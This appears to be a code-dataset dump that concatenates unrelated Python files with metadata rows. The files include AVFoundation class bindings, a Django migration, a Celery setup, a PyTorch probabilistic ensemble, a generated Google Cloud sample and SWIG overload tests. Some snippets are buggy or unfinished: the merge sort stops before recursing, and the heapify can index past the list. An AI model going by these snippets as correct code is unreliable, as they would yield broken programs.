AVFragmentedMediaDataReport = _Class('AVFragmentedMediaDataReport')
AVFragmentedMediaDataReportInternal = _Class('AVFragmentedMediaDataReportInternal')
AVAssetWriterFigAssetWriterNotificationHandler = _Class('AVAssetWriterFigAssetWriterNotificationHandler')
AVAssetWriterHelper = _Class('AVAssetWriterHelper')
AVAssetWriterTerminalHelper = _Class('AVAssetWriterTerminalHelper')
AVAssetWriterClientInitiatedTerminalHelper = _Class('AVAssetWriterClientInitiatedTerminalHelper')
AVAssetWriterFailedTerminalHelper = _Class('AVAssetWriterFailedTerminalHelper')
AVAssetWriterFinishWritingHelper = _Class('AVAssetWriterFinishWritingHelper')
AVAssetWriterWritingHelper = _Class('AVAssetWriterWritingHelper')
AVAssetWriterUnknownHelper = _Class('AVAssetWriterUnknownHelper')
AVAssetWriter = _Class('AVAssetWriter')
AVAssetWriterInternal = _Class('AVAssetWriterInternal')
AVAssetWriterConfigurationState = _Class('AVAssetWriterConfigurationState')
AVAssetReaderSampleReferenceOutputInternal = _Class('AVAssetReaderSampleReferenceOutputInternal')
AVAssetReaderVideoCompositionOutputInternal = _Class('AVAssetReaderVideoCompositionOutputInternal')
AVAssetReaderAudioMixOutputInternal = _Class('AVAssetReaderAudioMixOutputInternal')
AVAssetReaderTrackOutputInternal = _Class('AVAssetReaderTrackOutputInternal')
AVAssetReaderOutput = _Class('AVAssetReaderOutput')
AVAssetReaderSampleReferenceOutput = _Class('AVAssetReaderSampleReferenceOutput')
AVAssetReaderVideoCompositionOutput = _Class('AVAssetReaderVideoCompositionOutput')
AVAssetReaderAudioMixOutput = _Class('AVAssetReaderAudioMixOutput')
AVAssetReaderTrackOutput = _Class('AVAssetReaderTrackOutput')
AVAssetReaderOutputInternal = _Class('AVAssetReaderOutputInternal')
AVAssetReader = _Class('AVAssetReader')
AVAssetReaderInternal = _Class('AVAssetReaderInternal')
AVAssetTrackSegment = _Class('AVAssetTrackSegment')
AVCompositionTrackSegment = _Class('AVCompositionTrackSegment')
AVCompositionTrackSegmentInternal = _Class('AVCompositionTrackSegmentInternal')
AVMutableCompositionTrackInternal = _Class('AVMutableCompositionTrackInternal')
AVCompositionTrackInternal = _Class('AVCompositionTrackInternal')
AVCompositionTrackFormatDescriptionReplacement = _Class('AVCompositionTrackFormatDescriptionReplacement')
AVFigObjectInspector = _Class('AVFigObjectInspector')
AVAssetTrackInspector = _Class('AVAssetTrackInspector')
AVStreamDataAssetTrackInspector = _Class('AVStreamDataAssetTrackInspector')
AVPlaybackItemTrackInspector = _Class('AVPlaybackItemTrackInspector')
AVFigAssetTrackInspector = _Class('AVFigAssetTrackInspector')
AVTrackReaderInspector = _Class('AVTrackReaderInspector')
AVCompositionTrackReaderInspector = _Class('AVCompositionTrackReaderInspector')
AVAssetInspector = _Class('AVAssetInspector')
AVStreamDataAssetInspector = _Class('AVStreamDataAssetInspector')
AVFigAssetInspector = _Class('AVFigAssetInspector')
AVStreamingResourceInspector = _Class('AVStreamingResourceInspector')
AVPlaybackItemInspector = _Class('AVPlaybackItemInspector')
AVFormatReaderInspector = _Class('AVFormatReaderInspector')
AVCompositionFormatReaderInspector = _Class('AVCompositionFormatReaderInspector')
AVMutableCompositionInternal = _Class('AVMutableCompositionInternal')
AVCompositionInternal = _Class('AVCompositionInternal')
AVOutputDeviceDiscoverySessionAvailableOutputDevices = _Class('AVOutputDeviceDiscoverySessionAvailableOutputDevices')
AVEmptyOutputDeviceDiscoverySessionAvailableOutputDevices = _Class('AVEmptyOutputDeviceDiscoverySessionAvailableOutputDevices')
AVOutputDeviceDiscoverySession = _Class('AVOutputDeviceDiscoverySession')
AVOutputDeviceDiscoverySessionAvailableOutputDevicesInternal = _Class('AVOutputDeviceDiscoverySessionAvailableOutputDevicesInternal')
AVOutputDeviceDiscoverySessionInternal = _Class('AVOutputDeviceDiscoverySessionInternal')
AVQueuePlayerInternal = _Class('AVQueuePlayerInternal')
AVAssetDownloadStorageManagementPolicyInternal = _Class('AVAssetDownloadStorageManagementPolicyInternal')
AVAssetDownloadStorageManagementPolicy = _Class('AVAssetDownloadStorageManagementPolicy')
AVMutableAssetDownloadStorageManagementPolicy = _Class('AVMutableAssetDownloadStorageManagementPolicy')
AVAssetDownloadStorageManager = _Class('AVAssetDownloadStorageManager')
AVPlayerItemTrack = _Class('AVPlayerItemTrack')
AVPlayerItemTrackInternal = _Class('AVPlayerItemTrackInternal')
AVPlayerLoggingIdentifier = _Class('AVPlayerLoggingIdentifier')
AVPlayerLoggingIdentifierInternal = _Class('AVPlayerLoggingIdentifierInternal')
AVAssetLoggingIdentifier = _Class('AVAssetLoggingIdentifier')
AVAssetLoggingIdentifierInternal = _Class('AVAssetLoggingIdentifierInternal')
AVSpecifiedLoggingIdentifier = _Class('AVSpecifiedLoggingIdentifier')
AVSpecifiedLoggingIdentifierInternal = _Class('AVSpecifiedLoggingIdentifierInternal')
AVPlayerConnection = _Class('AVPlayerConnection')
AVPlayerItem = _Class('AVPlayerItem')
AVPlayerItemInternal = _Class('AVPlayerItemInternal')
AVOutputContextLocalOutputDeviceGroupImpl = _Class('AVOutputContextLocalOutputDeviceGroupImpl')
AVPlayerQueueModificationDescription = _Class('AVPlayerQueueModificationDescription')
AVPlayer = _Class('AVPlayer')
AVQueuePlayer = _Class('AVQueuePlayer')
AVPlayerInternal = _Class('AVPlayerInternal')
AVAssetTrack = _Class('AVAssetTrack')
AVMovieTrack = _Class('AVMovieTrack')
AVMutableMovieTrack = _Class('AVMutableMovieTrack')
AVFragmentedMovieTrack = _Class('AVFragmentedMovieTrack')
AVFragmentedAssetTrack = _Class('AVFragmentedAssetTrack')
AVCompositionTrack = _Class('AVCompositionTrack')
AVMutableCompositionTrack = _Class('AVMutableCompositionTrack')
AVAssetTrackInternal = _Class('AVAssetTrackInternal')
AVAssetReaderOutputMetadataAdaptor = _Class('AVAssetReaderOutputMetadataAdaptor')
AVAssetReaderOutputMetadataAdaptorInternal = _Class('AVAssetReaderOutputMetadataAdaptorInternal')
AVAssetImageGenerator = _Class('AVAssetImageGenerator')
AVAssetImageGeneratorInternal = _Class('AVAssetImageGeneratorInternal')
AVURLAssetItemProviderData = _Class('AVURLAssetItemProviderData')
AVAssetClientURLRequestHelper = _Class('AVAssetClientURLRequestHelper')
AVURLAssetInternal = _Class('AVURLAssetInternal')
AVAssetFragment = _Class('AVAssetFragment')
AVAssetFragmentInternal = _Class('AVAssetFragmentInternal')
AVAsset = _Class('AVAsset')
AVStreamDataAsset = _Class('AVStreamDataAsset')
AVMovie = _Class('AVMovie')
AVMutableMovie = _Class('AVMutableMovie')
AVFragmentedMovie = _Class('AVFragmentedMovie')
AVAssetProxy = _Class('AVAssetProxy')
AVComposition = _Class('AVComposition')
AVMutableComposition = _Class('AVMutableComposition')
AVDataAsset = _Class('AVDataAsset')
AVURLAsset = _Class('AVURLAsset')
AVStreamDataInspectionOnlyAsset = _Class('AVStreamDataInspectionOnlyAsset')
AVFragmentedAsset = _Class('AVFragmentedAsset')
AVAssetInternal = _Class('AVAssetInternal')
AVMetadataItemFilterInternal = _Class('AVMetadataItemFilterInternal')
AVMetadataItemFilter = _Class('AVMetadataItemFilter')
AVMetadataItemFilterForSharing = _Class('AVMetadataItemFilterForSharing')
AVChapterMetadataItemInternal = _Class('AVChapterMetadataItemInternal')
AVMetadataItemValueRequest = _Class('AVMetadataItemValueRequest')
AVMetadataItemValueRequestInternal = _Class('AVMetadataItemValueRequestInternal')
AVLazyValueLoadingMetadataItemInternal = _Class('AVLazyValueLoadingMetadataItemInternal')
AVMetadataItem = _Class('AVMetadataItem')
AVChapterMetadataItem = _Class('AVChapterMetadataItem')
AVLazyValueLoadingMetadataItem = _Class('AVLazyValueLoadingMetadataItem')
AVMutableMetadataItem = _Class('AVMutableMetadataItem')
AVMetadataItemInternal = _Class('AVMetadataItemInternal')
AVPlayerLooper = _Class('AVPlayerLooper')
AVPlayerLooperInternal = _Class('AVPlayerLooperInternal')
AVPlayerLayerInternal = _Class('AVPlayerLayerInternal')
AVFigRemoteRouteDiscovererFactory = _Class('AVFigRemoteRouteDiscovererFactory')
AVRunLoopCondition = _Class('AVRunLoopCondition')
AVURLAuthenticationChallenge = _Class('AVURLAuthenticationChallenge')
AVAggregateAssetDownloadTask = _Class('AVAggregateAssetDownloadTask')
AVOperationQueueWithFundamentalDependency = _Class('AVOperationQueueWithFundamentalDependency')
AVNetworkPlaybackPerfHUDLayer = _Class('AVNetworkPlaybackPerfHUDLayer')
AVSampleBufferDisplayLayer = _Class('AVSampleBufferDisplayLayer')
AVSampleBufferDisplayLayerContentLayer = _Class('AVSampleBufferDisplayLayerContentLayer')
AVSynchronizedLayer = _Class('AVSynchronizedLayer')
AVPlayerLayer = _Class('AVPlayerLayer')
AVPlayerLayerIntermediateLayer = _Class('AVPlayerLayerIntermediateLayer')
AVWaitForNotificationOrDeallocationOperation = _Class('AVWaitForNotificationOrDeallocationOperation')
AVOperation = _Class('AVOperation')
AVRouteConfigUpdatedFigRoutingContextRouteChangeOperation = _Class('AVRouteConfigUpdatedFigRoutingContextRouteChangeOperation')
AVFigRoutingContextRouteChangeOperation = _Class('AVFigRoutingContextRouteChangeOperation')
AVFigRoutingContextSendConfigureDeviceCommandOperation = _Class('AVFigRoutingContextSendConfigureDeviceCommandOperation')
AVBlockOperation = _Class('AVBlockOperation')
AVAssetWriterInputFigAssetWriterEndPassOperation = _Class('AVAssetWriterInputFigAssetWriterEndPassOperation')
AVFigAssetWriterFinishWritingAsyncOperation = _Class('AVFigAssetWriterFinishWritingAsyncOperation')
AVWorkaroundNSBlockOperation = _Class('AVWorkaroundNSBlockOperation')
AVMetadataEnumerator = _Class('AVMetadataEnumerator')
AVAssetTrackEnumerator = _Class('AVAssetTrackEnumerator')
AVTimeFormatter = _Class('AVTimeFormatter')
CMTimeMappingAsValue = _Class('CMTimeMappingAsValue')
CMTimeRangeAsValue = _Class('CMTimeRangeAsValue')
CMTimeAsValue = _Class('CMTimeAsValue')
AVFragmentedAssetsArray = _Class('AVFragmentedAssetsArray')
| [
"[email protected]"
] | |
34fbcbb5b07243310281ddcea4e59205032d636b | 153da69b35f032f5b83a06f17008ba41a1b336b4 | /src/demo/__init__.py | da984a42f90721752b48b31d39530ff3bf6f8ff9 | [
"MIT"
] | permissive | TrendingTechnology/hspylib | 6400cadf9dfe6ab5733712dcfeccf8022d61c589 | c79a2c17e89fe21d00ccd9c1646a03407cd61839 | refs/heads/master | 2023-06-20T15:47:35.962661 | 2021-07-19T22:12:18 | 2021-07-19T23:45:41 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 148 | py | # _*_ coding: utf-8 _*_
#
# HSPyLib v0.11.1
#
# Package: demo
"""Package initialization."""
__all__ = [
'calculator',
'cli',
'phonebook'
]
| [
"[email protected]"
] | |
30b2b633485473169ebe3f7392c7b57e23c0e4d2 | da7a165522daea7c346693c5f32850017c482967 | /leetcode/60questions/347_top_k_frequent_elements.py | b13499eff1c603b9085c6ed2ac07a357fad804ac | [] | no_license | SShayashi/ABC | 19f8750919208c5ff8935638dbaab941c255f914 | 3cbfee0c5251c1bb0df6306166d8d4b33bf7bb2c | refs/heads/master | 2021-05-04T21:06:10.720367 | 2020-07-11T13:59:16 | 2020-07-11T13:59:29 | 119,886,572 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 939 | py | from typing import List
class Solution:
def topKFrequent(self, nums: List[int], k: int) -> List[int]:
d = {}
for num in nums:
d[num] = d[num] + 1 if d.get(num, 0) else 1
tmp = list(d.items())
tmp.sort(key=lambda x: x[1], reverse=True)
ans = []
for i in range(k):
ans.append(tmp[i][0])
return ans
def maxheaplify(nums: List[int], i):
left = nums[i * 2 + 1]
right = nums[i * 2 + 2] if (i * 2 + 2) < len(nums) else -9999999
large_child_i = i * 2 + 1 if left > right else i * 2 + 2
if nums[i] < nums[large_child_i]:
nums[i], nums[large_child_i] = nums[large_child_i], nums[i]
maxheaplify(nums, i // 2)
def heaplify(nums: List[int]):
length = len(nums)
for i in reversed(range(length // 2)):
maxheaplify(nums, i)
return nums
y = [3, 5, 6, 8, 2, 3, 4, 5, 21, 1, 4, 5, 7, 9, 2, 22]
print(heaplify(y))
| [
"[email protected]"
] | |
ff99da7f9a431c6ffe09cca96a217b4f38518c7a | 52b5773617a1b972a905de4d692540d26ff74926 | /.history/merge_20200722101228.py | fc5063ed0117fd9fbf7a41674a7bab7060ccc3e0 | [] | no_license | MaryanneNjeri/pythonModules | 56f54bf098ae58ea069bf33f11ae94fa8eedcabc | f4e56b1e4dda2349267af634a46f6b9df6686020 | refs/heads/master | 2022-12-16T02:59:19.896129 | 2020-09-11T12:05:22 | 2020-09-11T12:05:22 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 477 | py | items = []
def mergeSort(data):
if len(data) > 1:
mid = len(data) // 2
leftArr = data[:mid]
rightArr= data[mid:]
# now to perform the merge
i = 0
j = 0
k = 0
while i < len(leftArr) and j < len(rightArr):
if leftArr[i] < rightArr[j]:
data[k] =leftArr[i]
i +=1
else:
data[k] = rightArr[j]
j +=1
| [
"[email protected]"
] | |
bde3cdffacb74c379934c3b976da5ac53db144a3 | 51e93332b5b0221bb1b34d4b53f761d9d53e1b9c | /app/core/migrations/0001_initial.py | a88ea9f86995282d556a7ffaa56cd09c1bfd0e23 | [
"MIT"
] | permissive | MaistrenkoAnton/TDD | 286d0cb0d24c796f045eeac4d03f29ac3bf0ab5a | 20049d08f22aeeb626a7975bbee3dc5c95c76449 | refs/heads/master | 2020-06-02T03:32:20.396472 | 2019-08-05T12:24:57 | 2019-08-05T12:24:57 | 191,021,446 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,707 | py | # Generated by Django 2.1.9 on 2019-06-09 19:47
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
('auth', '0009_alter_user_last_name_max_length'),
]
operations = [
migrations.CreateModel(
name='User',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('password', models.CharField(max_length=128, verbose_name='password')),
('last_login', models.DateTimeField(blank=True, null=True, verbose_name='last login')),
('is_superuser', models.BooleanField(default=False, help_text='Designates that this user has all permissions without explicitly assigning them.', verbose_name='superuser status')),
('email', models.EmailField(max_length=255, unique=True)),
('name', models.CharField(max_length=255)),
('is_active', models.BooleanField(default=True)),
('is_staff', models.BooleanField(default=True)),
('groups', models.ManyToManyField(blank=True, help_text='The groups this user belongs to. A user will get all permissions granted to each of their groups.', related_name='user_set', related_query_name='user', to='auth.Group', verbose_name='groups')),
('user_permissions', models.ManyToManyField(blank=True, help_text='Specific permissions for this user.', related_name='user_set', related_query_name='user', to='auth.Permission', verbose_name='user permissions')),
],
options={
'abstract': False,
},
),
]
| [
"[email protected]"
] | |
710826787f7469b5c8d8e68f530a894b8067623e | f24f8a5cf1580470cf616705a220027feac9b177 | /awesome/api/awesome/celery.py | ecb47c15ebd34979cbb44196e89352deda7f603a | [] | no_license | tvtrong/restapi | 4f5eb4ad545ed9dd7847f63994957fdc76fc3eba | c3da498108df1e7950ea2cc003dd75f0fe5a1b60 | refs/heads/master | 2022-12-25T19:39:45.627411 | 2020-10-10T12:39:33 | 2020-10-10T12:39:33 | 302,898,797 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 245 | py | import os
from celery import Celery
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "awesome.settings")
celery_app = Celery("awesome")
celery_app.config_from_object("django.conf:settings", namespace="CELERY")
celery_app.autodiscover_tasks()
| [
"[email protected]"
] | |
746774617ed9e37b03bbc24665b63b4a592bf514 | baf3996414315ffb60470c40c7ad797bf4e6897f | /02_ai/1_ml/4_ml_mastery/code/chapter_09/shuffle_split.py | 300dc2268fc15665661c5450849e0a375e9836d3 | [
"MIT"
] | permissive | thiago-allue/portfolio | 8fbbecca7ce232567aebe97c19944f444508b7f4 | 0acd8253dc7c5150fef9b2d46eead3db83ca42de | refs/heads/main | 2023-03-15T22:10:21.109707 | 2022-09-14T17:04:35 | 2022-09-14T17:04:35 | 207,919,073 | 0 | 0 | null | 2019-11-13T18:18:23 | 2019-09-11T22:40:46 | Python | UTF-8 | Python | false | false | 733 | py | # Evaluate using Shuffle Split Cross Validation
from pandas import read_csv
from sklearn.model_selection import ShuffleSplit
from sklearn.model_selection import cross_val_score
from sklearn.linear_model import LogisticRegression
filename = 'pima-indians-diabetes.data.csv'
names = ['preg', 'plas', 'pres', 'skin', 'test', 'mass', 'pedi', 'age', 'class']
dataframe = read_csv(filename, names=names)
array = dataframe.values
X = array[:,0:8]
Y = array[:,8]
n_splits = 10
test_size = 0.33
seed = 7
kfold = ShuffleSplit(n_splits=n_splits, test_size=test_size, random_state=seed)
model = LogisticRegression()
results = cross_val_score(model, X, Y, cv=kfold)
print("Accuracy: %.3f%% (%.3f%%)" % (results.mean()*100.0, results.std()*100.0)) | [
"[email protected]"
] | |
c62c24e115cdf1835d84b2b7bb4b7def2fbadcf6 | 5da5473ff3026165a47f98744bac82903cf008e0 | /packages/google-cloud-dms/samples/generated_samples/datamigration_v1_generated_data_migration_service_stop_migration_job_async.py | a4bc8f0f5878cfe73e659344426766b46ce49d17 | [
"Apache-2.0"
] | permissive | googleapis/google-cloud-python | ed61a5f03a476ab6053870f4da7bc5534e25558b | 93c4e63408c65129422f65217325f4e7d41f7edf | refs/heads/main | 2023-09-04T09:09:07.852632 | 2023-08-31T22:49:26 | 2023-08-31T22:49:26 | 16,316,451 | 2,792 | 917 | Apache-2.0 | 2023-09-14T21:45:18 | 2014-01-28T15:51:47 | Python | UTF-8 | Python | false | false | 1,959 | py | # -*- coding: utf-8 -*-
# Copyright 2023 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Generated code. DO NOT EDIT!
#
# Snippet for StopMigrationJob
# NOTE: This snippet has been automatically generated for illustrative purposes only.
# It may require modifications to work in your environment.
# To install the latest published package dependency, execute the following:
# python3 -m pip install google-cloud-dms
# [START datamigration_v1_generated_DataMigrationService_StopMigrationJob_async]
# This snippet has been automatically generated and should be regarded as a
# code template only.
# It will require modifications to work:
# - It may require correct/in-range values for request initialization.
# - It may require specifying regional endpoints when creating the service
# client as shown in:
# https://googleapis.dev/python/google-api-core/latest/client_options.html
from google.cloud import clouddms_v1
async def sample_stop_migration_job():
# Create a client
client = clouddms_v1.DataMigrationServiceAsyncClient()
# Initialize request argument(s)
request = clouddms_v1.StopMigrationJobRequest(
)
# Make the request
operation = client.stop_migration_job(request=request)
print("Waiting for operation to complete...")
response = (await operation).result()
# Handle the response
print(response)
# [END datamigration_v1_generated_DataMigrationService_StopMigrationJob_async]
| [
"[email protected]"
] | |
fab55d204978d837e4212c08440b33872d36947d | 2405752a692d003f83fa2f24272d7afa47254fc6 | /dynamics/probabilistic_ensemble.py | 21cd4706ea25f86a424352dc12e3a9c085389b78 | [
"MIT"
] | permissive | ZhihanLee/sac-plus | 1edee7724939484cf72181e0789c3e03a2542451 | 829c8652bc07a420e855ace696ae44de5feb5379 | refs/heads/main | 2023-03-09T01:27:30.775603 | 2021-02-21T22:46:47 | 2021-02-21T22:46:47 | 476,717,412 | 2 | 0 | MIT | 2022-04-01T12:46:44 | 2022-04-01T12:46:43 | null | UTF-8 | Python | false | false | 8,717 | py | import os
import torch as th
from torch import nn as nn
from torch.nn import functional as F
import numpy as np
import pickle
#TODO:
# - Better to predict logvar or logstd?
# - Learn logvar or keep it constant?
# - Holdout loss: best ratio? save best checkpoint in epoch? individual improvement?
class EnsembleLayer(nn.Module):
def __init__(self, ensemble_size, input_dim, output_dim):
super().__init__()
self.W = nn.Parameter(th.empty((ensemble_size, input_dim, output_dim)), requires_grad=True).float()
nn.init.xavier_uniform_(self.W, gain=nn.init.calculate_gain('relu'))
self.b = nn.Parameter(th.zeros((ensemble_size, 1, output_dim)), requires_grad=True).float()
def forward(self, x):
# assumes x is 3D: (ensemble_size, batch_size, dimension)
return x @ self.W + self.b
class ProbabilisticEnsemble(nn.Module):
def __init__(self, input_dim, output_dim, ensemble_size=5, arch=(200,200,200,200), activation=F.relu, learning_rate=0.001, num_elites=2, device='auto'):
super().__init__()
self.ensemble_size = ensemble_size
self.input_dim = input_dim
self.output_dim = output_dim * 2 # mean and std
self.activation = activation
self.arch = arch
self.num_elites = num_elites
self.elites = [i for i in range(self.ensemble_size)]
self.layers = nn.ModuleList()
in_size = input_dim
for hidden_size in self.arch:
self.layers.append(EnsembleLayer(ensemble_size, in_size, hidden_size))
in_size = hidden_size
self.layers.append(EnsembleLayer(ensemble_size, self.arch[-1], self.output_dim))
self.inputs_mu = nn.Parameter(th.zeros(input_dim), requires_grad=False).float()
self.inputs_sigma = nn.Parameter(th.zeros(input_dim), requires_grad=False).float()
self.max_logvar = nn.Parameter(th.ones(1, output_dim, dtype=th.float32) / 2.0).float()
self.min_logvar = nn.Parameter(-th.ones(1, output_dim, dtype=th.float32) * 10.0).float()
self.decays = [0.000025, 0.00005, 0.000075, 0.000075, 0.0001]
self.optim = th.optim.Adam([{'params': self.layers[i].parameters(), 'weight_decay': self.decays[i]} for i in range(len(self.layers))] +
[{'params': self.max_logvar}, {'params': self.min_logvar}], lr=learning_rate)
if device == 'auto':
self.device = th.device('cuda') if th.cuda.is_available() else th.device('cpu')
else:
self.device = device
self.to(self.device)
def forward(self, input, deterministic=False, return_dist=False):
dim = len(input.shape)
# input normalization
h = (input - self.inputs_mu) / self.inputs_sigma
# repeat h to make amenable to parallelization
# if dim = 3, then we probably already did this somewhere else (e.g. bootstrapping in training optimization)
if dim < 3:
h = h.unsqueeze(0)
if dim == 1:
h = h.unsqueeze(0)
h = h.repeat(self.ensemble_size, 1, 1)
for layer in self.layers[:-1]:
h = layer(h)
h = self.activation(h)
output = self.layers[-1](h)
# if original dim was 1D, squeeze the extra created layer
if dim == 1:
output = output.squeeze(1) # output is (ensemble_size, output_size)
mean, logvar = th.chunk(output, 2, dim=-1)
# Variance clamping to prevent poor numerical predictions
logvar = self.max_logvar - F.softplus(self.max_logvar - logvar)
logvar = self.min_logvar + F.softplus(logvar - self.min_logvar)
if deterministic:
if return_dist:
return mean, logvar
else:
return mean
else:
std = th.sqrt(th.exp(logvar))
samples = mean + std * th.randn(std.shape, device=std.device)
if return_dist:
return samples, mean, logvar
else:
return samples
def compute_loss(self, x, y):
mean, logvar = self.forward(x, deterministic=True, return_dist=True)
inv_var = th.exp(-logvar)
if len(y.shape) < 3:
y = y.unsqueeze(0).repeat(self.ensemble_size, 1, 1)
mse_losses = (th.square(mean - y) * inv_var).mean(-1).mean(-1)
var_losses = logvar.mean(-1).mean(-1)
total_losses = (mse_losses + var_losses).sum()
total_losses += 0.01*self.max_logvar.sum() - 0.01*self.min_logvar.sum()
return total_losses
def compute_mse_losses(self, x, y):
mean = self.forward(x, deterministic=True, return_dist=False)
if len(y.shape) < 3:
y = y.unsqueeze(0).repeat(self.ensemble_size, 1, 1)
mse_losses = (mean - y)**2
return mse_losses.mean(-1).mean(-1)
def save(self, path):
save_dir = 'weights/'
if not os.path.isdir(save_dir):
os.makedirs(save_dir)
th.save({'ensemble_state_dict': self.state_dict(),
'ensemble_optimizer_state_dict': self.optim.state_dict()}, path + '.tar')
def load(self, path):
params = th.load(path)
self.load_state_dict(params['ensemble_state_dict'])
self.optim.load_state_dict(params['ensemble_optimizer_state_dict'])
def fit_input_stats(self, data):
mu = np.mean(data, axis=0, keepdims=True)
sigma = np.std(data, axis=0, keepdims=True)
sigma[sigma < 1e-12] = 1.0
self.inputs_mu.data = th.from_numpy(mu).to(self.device).float() # Can I ommit .data?
self.inputs_sigma.data = th.from_numpy(sigma).to(self.device).float()
def train_ensemble(self, X, Y, batch_size=256, holdout_ratio=0.1, max_holdout_size=5000, max_epochs_no_improvement=5, max_epochs=200):
self.fit_input_stats(X)
num_holdout = min(int(X.shape[0] * holdout_ratio), max_holdout_size)
permutation = np.random.permutation(X.shape[0])
inputs, holdout_inputs = X[permutation[num_holdout:]], X[permutation[:num_holdout]]
targets, holdout_targets = Y[permutation[num_holdout:]], Y[permutation[:num_holdout]]
holdout_inputs = th.from_numpy(holdout_inputs).to(self.device).float()
holdout_targets = th.from_numpy(holdout_targets).to(self.device).float()
idxs = np.random.randint(inputs.shape[0], size=[self.ensemble_size, inputs.shape[0]])
num_batches = int(np.ceil(idxs.shape[-1] / batch_size))
def shuffle_rows(arr):
idxs = np.argsort(np.random.uniform(size=arr.shape), axis=-1)
return arr[np.arange(arr.shape[0])[:, None], idxs]
num_epochs_no_improvement = 0
epoch = 0
best_holdout_losses = [float('inf') for _ in range(self.ensemble_size)]
while num_epochs_no_improvement < max_epochs_no_improvement and epoch < max_epochs:
self.train()
for batch_num in range(num_batches):
batch_idxs = idxs[:, batch_num * batch_size : (batch_num + 1) * batch_size]
batch_x, batch_y = inputs[batch_idxs], targets[batch_idxs]
batch_x, batch_y = th.from_numpy(batch_x).to(self.device).float(), th.from_numpy(batch_y).to(self.device).float()
loss = self.compute_loss(batch_x, batch_y)
self.optim.zero_grad()
loss.backward()
self.optim.step()
idxs = shuffle_rows(idxs)
self.eval()
with th.no_grad():
holdout_losses = self.compute_mse_losses(holdout_inputs, holdout_targets)
holdout_losses = [l.item() for l in holdout_losses]
#print('Epoch:', epoch, 'Holdout losses:', [l.item() for l in holdout_losses])
self.elites = np.argsort(holdout_losses)[:self.num_elites]
improved = False
for i in range(self.ensemble_size):
if epoch == 0 or (best_holdout_losses[i] - holdout_losses[i]) / (best_holdout_losses[i]) > 0.01:
best_holdout_losses[i] = holdout_losses[i]
num_epochs_no_improvement = 0
improved = True
if not improved:
num_epochs_no_improvement += 1
epoch += 1
print('Epoch:', epoch, 'Holdout losses:', ', '.join(["%.4f"%hl for hl in holdout_losses]))
return np.mean(holdout_losses)
if __name__ == '__main__':
with open('/home/lucas/Desktop/drl-cd/weights/drlcd-cheetah-ns-paper1data0', 'rb') as f:
memory = pickle.load(f)
X, Y = memory.to_train_batch()
model = ProbabilisticEnsemble(X.shape[1], Y.shape[1])
model.train_ensemble(X, Y, max_epochs=200) | [
"[email protected]"
] | |
32899d3e754390786ab649a1de26f959c3d28b8e | ebd6f68d47e192da7f81c528312358cfe8052c8d | /swig/Examples/test-suite/python/overload_template_runme.py | 014ec71cbb0db5035821e801e8ec2cb7a7342c9d | [
"LicenseRef-scancode-swig",
"GPL-3.0-or-later",
"LicenseRef-scancode-unknown-license-reference",
"GPL-3.0-only",
"Apache-2.0"
] | permissive | inishchith/DeepSpeech | 965ad34d69eb4d150ddf996d30d02a1b29c97d25 | dcb7c716bc794d7690d96ed40179ed1996968a41 | refs/heads/master | 2021-01-16T16:16:05.282278 | 2020-05-19T08:00:33 | 2020-05-19T08:00:33 | 243,180,319 | 1 | 0 | Apache-2.0 | 2020-02-26T05:54:51 | 2020-02-26T05:54:50 | null | UTF-8 | Python | false | false | 3,596 | py | from overload_template import *
f = foo()
a = maximum(3, 4)
b = maximum(3.4, 5.2)
# mix 1
if (mix1("hi") != 101):
raise RuntimeError, ("mix1(const char*)")
if (mix1(1.0, 1.0) != 102):
raise RuntimeError, ("mix1(double, const double &)")
if (mix1(1.0) != 103):
raise RuntimeError, ("mix1(double)")
# mix 2
if (mix2("hi") != 101):
raise RuntimeError, ("mix2(const char*)")
if (mix2(1.0, 1.0) != 102):
raise RuntimeError, ("mix2(double, const double &)")
if (mix2(1.0) != 103):
raise RuntimeError, ("mix2(double)")
# mix 3
if (mix3("hi") != 101):
raise RuntimeError, ("mix3(const char*)")
if (mix3(1.0, 1.0) != 102):
raise RuntimeError, ("mix3(double, const double &)")
if (mix3(1.0) != 103):
raise RuntimeError, ("mix3(double)")
# Combination 1
if (overtparams1(100) != 10):
raise RuntimeError, ("overtparams1(int)")
if (overtparams1(100.0, 100) != 20):
raise RuntimeError, ("overtparams1(double, int)")
# Combination 2
if (overtparams2(100.0, 100) != 40):
raise RuntimeError, ("overtparams2(double, int)")
# Combination 3
if (overloaded() != 60):
raise RuntimeError, ("overloaded()")
if (overloaded(100.0, 100) != 70):
raise RuntimeError, ("overloaded(double, int)")
# Combination 4
if (overloadedagain("hello") != 80):
raise RuntimeError, ("overloadedagain(const char *)")
if (overloadedagain() != 90):
raise RuntimeError, ("overloadedagain(double)")
# specializations
if (specialization(10) != 202):
raise RuntimeError, ("specialization(int)")
if (specialization(10.0) != 203):
raise RuntimeError, ("specialization(double)")
if (specialization(10, 10) != 204):
raise RuntimeError, ("specialization(int, int)")
if (specialization(10.0, 10.0) != 205):
raise RuntimeError, ("specialization(double, double)")
if (specialization("hi", "hi") != 201):
raise RuntimeError, ("specialization(const char *, const char *)")
# simple specialization
xyz()
xyz_int()
xyz_double()
# a bit of everything
if (overload("hi") != 0):
raise RuntimeError, ("overload()")
if (overload(1) != 10):
raise RuntimeError, ("overload(int t)")
if (overload(1, 1) != 20):
raise RuntimeError, ("overload(int t, const int &)")
if (overload(1, "hello") != 30):
raise RuntimeError, ("overload(int t, const char *)")
k = Klass()
if (overload(k) != 10):
raise RuntimeError, ("overload(Klass t)")
if (overload(k, k) != 20):
raise RuntimeError, ("overload(Klass t, const Klass &)")
if (overload(k, "hello") != 30):
raise RuntimeError, ("overload(Klass t, const char *)")
if (overload(10.0, "hi") != 40):
raise RuntimeError, ("overload(double t, const char *)")
if (overload() != 50):
raise RuntimeError, ("overload(const char *)")
